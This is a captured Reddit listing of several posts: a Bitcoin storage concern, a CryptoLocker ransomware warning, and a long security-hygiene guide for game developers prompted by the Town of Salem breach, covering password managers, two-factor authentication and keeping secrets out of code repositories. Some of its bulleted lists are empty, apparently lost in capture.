Gold, cash have their own problems. But most important issue is Knowledge. With Gold, people know what to expect. Stealing, losing objects is something everyone naturally understands. With Bitcoin there are new ways in which things can go bad. Maybe most people will never understand the possibilities here? Note: issues are for long term storage. Families change, locations change, Devices change, maybe attack areas change.
Not to diss on BTC. Just think there could be more awareness here. To keep BTC safe/r. Development of tools, methods, PC's ?
Edit: expected better :(
submitted by batbitcoin to Bitcoin [link] [comments]

College Education Resources

Not a complete list, but somewhere to start
United States
submitted by chrisknight1985 to cybersecurity [link] [comments]

YSK about CryptoLocker, a virus that encrypts all possible files and then demands $300 to decrypt them.

CryptoLocker is gaining quite a bit of traction recently. Once infected (usually via email attachments but other methods have been reported) it begins encrypting individual files that match certain filetypes (pdf, doc, xls, dwg, sld, the list goes on). It will encrypt any non-system files on your PC which your user has write access to. It will also encrypt files on networked drives that it has write access to.
After it thinks it is done encrypting everything it displays a message letting you know that everything is encrypted and demands $300 to decrypt the files starting with a 100 hour countdown. After the 100 hours is up the virus uninstalls itself and you won't be able to get your files back. AT ALL.
The good news is, if you have backups you can restore those after you have cleaned the virus. You can also pay the $300 and it will actually decrypt the files, but the actual end-point of the money is unknown. It could go to a single person, or a terrorist organization.
You Should Know about this because it can wreak havoc at on your home computer, but can also wreck your company's shared drives and such if the virus is on a work computer.
More technical details here:
submitted by SpectralCoding to YouShouldKnow [link] [comments]

The importance of being mindful of security at all times - nearly everyone is one breach away from total disaster

This is a long one - TL;DR at the end!

If you haven't heard yet: BlankMediaGames, makers of Town of Salem, have been breached which resulted in almost 8 million accounts being leaked. For most people, the first reaction is "lol so what it's just a game, why should I really care?" and that is the wrong way to look at it. I'd like to explain why everyone should always care whenever they are part of a breach. I'd also like to talk about some ways game developers - whether they work solo or on a team - can take easy steps to help protect themselves and their customers/players.
First I'd like to state that there is no practical way to achieve 100% solid security to guarantee you'll never be breached or part of a breach. The goal here will be to get as close as possible, or comfortable, so that you can rest easy knowing you can deal with problems when they occur (not if, when).

Why You Should Care About Breaches

The sad reality is most people re-use the same password everywhere. Your email account, your bank account, your steam account, your reddit account, random forums and game websites - you get the idea. If you haven't pieced it together yet the implication is that if anyone gets your one password you use everywhere, it's game over for you - they now own all of your accounts (whether or not they know it yet). Keep in mind that your email account is basically the holy grail of passwords to have. Most websites handle password changes/resets through your email; thus anyone who can login to your email account can get access to pretty much any of your accounts anywhere. Game over, you lose.

But wait, why would anyone want to use my password? I'm nobody!

It doesn't matter, the bad guys sell this information to other bad guys. Bots are used to make as much use of these passwords as possible. If they can get into your bank they might try money transfers. If they get into your Amazon account they might spin up $80,000 worth of servers to mine Bitcoin (or whatever coin is popular at the time). They don't care who you are; it's all automated.
By the way, according to this post (which looks believable enough to be real) this is pretty much how they got into the BMG servers initially. They checked for usernames/emails of admins on the BMG website(s) in previous breach dumps (of which there are many) and found at least one that used the same password on other sites - for their admin account!
If you want to see how many of your accounts are already breached check out Have I Been Pwned - I recommend registering all of your email addresses as well so you get notified of future breaches. This is how I found out about the Town of Salem breach, myself.

How You Can Protect Yourself

Before I go into all the steps you can (and should) take to protect yourself I should note that security is in a constant tug of war with convenience. What this means is that the more security measures you apply the more inconvenienced you become for many tasks. It's up to you to decide how much is too much either way.
First of all I strongly recommend registering your email(s) on https://haveibeenpwned.com/ - this is especially important if your email address is associated to important things like AWS, Steam developer account, bank accounts, social media, etc. You want to know ASAP when an account of yours is compromised so you can take steps to prevent or undo damage. Note that the bad guys have a head start on this!

Passwords

You probably need to have better password hygiene. If you don't already, you need to make sure every account you have uses a different, unique, secure password. You should change these passwords at least once a year. Depending on how many accounts you have and how good your memory is, this is your first big security vs convenience trade-off battle. That's easily solved, though, by using a password manager. You can find a list of password managers on Wikipedia here or you can search around for some comparison articles.
Some notable choices to consider:
Regardless of which one you choose, any of them is 100x better than not using one at all.

Multi-Factor Authentication / Two-Factor Authentication (aka MFA / 2FA)

The problem with all these passwords is that someone can still use them if they are found in a breach. Your passwords are only as strong as the website you use them on. In the case of the BMG breach mentioned above - all passwords were stored in an ancient format which has been insecure for years. It's likely that every single password in the breach can be reversed/cracked, or already have been. The next step you need to take is to make it harder for someone else to login with your password. This is done using Multi-Factor Authentication (or Two-Factor Authentication).
Unfortunately not every website/service supports MFA/2FA, but you should still use it on every single one that does support it. You can check which sites support MFA/2FA here or dig around in account options on any particular site. You should setup MFA/2FA on your email account ASAP! If it's not supported, you need to switch to a provider that does support it. This is more important than your bank account! All of the big email providers support it: GMail, Outlook.com, Yahoo Mail, etc.
The type of MFA/2FA you use depends on what is supported by each site/service, but there is a common approach that is compatible on many of them. Most of them involve phone apps because a phone is the most common and convenient "thing you have" that bad guys (or anyone, really) can't access easily. Time-based One-time Password or TOTP is probably the most commonly used method because it's easy to implement and can be used with many different apps. Google Authenticator was the first popular one, but it has some limitations which continue the security vs convenience battle - namely that getting a new phone is a super huge chore (no backup/restore option - you have to disable and setup each site all over again). Many alternatives support cloud backup which is really convenient, though obviously less secure by some measure.
Notable choices to consider:
Some sites/services use their own app, like Blizzard (battle.net) and Steam, and don't allow you to use other ones. You will probably have a few apps on your phone when all your accounts are setup, but it's worth it. You'll definitely want to enable it on your password manager as well if you chose a cloud-based one.
Don't forget to save backup codes in an actual secure location! If you lose your backup codes and your auth app/physical key you will be locked out of accounts. It's really not fun recovering in that situation. Most recommendations are to print them and put in a fireproof safe, but using some other secure encrypted storage is fine.
There is such a thing as bad MFA/2FA! However, anything is at least better than nothing. A lot of places still use SMS (text messaging) or e-mail for their MFA/2FA implementation. The e-mail one has the most obvious flaw: If someone gets into your email account they have defeated that security measure. The SMS flaws are less obvious and much less likely to affect you, but still a risk: SMS is trivial to intercept (capture data over the air (literally), clone your SIM card data, and some other methods). Still, if you're not a person of interest already, it's still better than nothing.

What Does This Have To Do With GameDev?

Yeah, I do know which subreddit I'm posting in! Here's the section that gets more into things specific to game development (or software development in general).

Secure Your Code

Securing your code actually has multiple meanings here: Securing access to your code, and ensuring your code itself is secure against exploitation. Let's start with access since that's the easier topic to cover!
If you're not already using some form of Source Control Management (SCM) you really need to get on board! I'm not going to go in depth on that as it's a whole other topic to itself, but I'll assume you are using Git or Mercurial (hg) already and hosting it on one of these sites (or a similar one):
First, ensure that you have locked down who can access this code already. If you are using private repositories you need to make sure that the only people who have access are the people who need access (i.e. yourself and your team). Second, everyone should have strong passwords and MFA/2FA enabled on their accounts. If 1 person on the team does not follow good security practices it puts your whole project at risk! So make sure everyone on the team is following along. You can also look into tools to do some auditing and even automate it so that if anyone's account becomes less secure over time (say they turned off MFA one day) they would automatically lose their access.
Additionally you should never commit secrets (passwords, API keys, tokens, social security numbers, etc) to your code repository. Probably 90% of cases where people have their AWS/Google Cloud/Azure accounts compromised and racking up huge bills for bitcoin mining is due to having their passwords/keys stored in their git repo. They either accidentally made it public or someone got access to the private repo through a compromised account. Never store sensitive information in your code repository!
Next topic: Securing your code from vulnerabilities. This one is harder to talk about for game dev as most engines/frameworks are not as susceptible (for lack of a better word) to these situations as others. In a nutshell, you need to keep track of the following:
A lot of these things cannot be solved automatically, unfortunately, but some of it can. If you are using Javascript for your game you likely will be using packages from npm - luckily they (recently) added security auditing for packages. For other languages you can look at tools like Snyk or some other alternatives to audit the libraries you use in your project. Unfortunately none that I know of are aimed at game dev in particular, but it's still important to use these tools when you can. In general, be aware of all of your code dependencies and what impact they can have on your game or your customers if there are security bugs. Impact can range from "can cheat in multiplayer" to "can get IP addresses of all players in the world" or even "can get all information I ever put on my server", etc.
In general you'll want to look into Secure Software Development Lifecycle (commonly SDLC) practices. Microsoft has some information on how they do it.

Secure Your Computer

I'm not going to go in depth on this one because at this point everyone should have a handle on this; if not there are limitless articles, blogs, and videos about the how/what/why. In summary: Keep everything updated, and don't open suspicious links.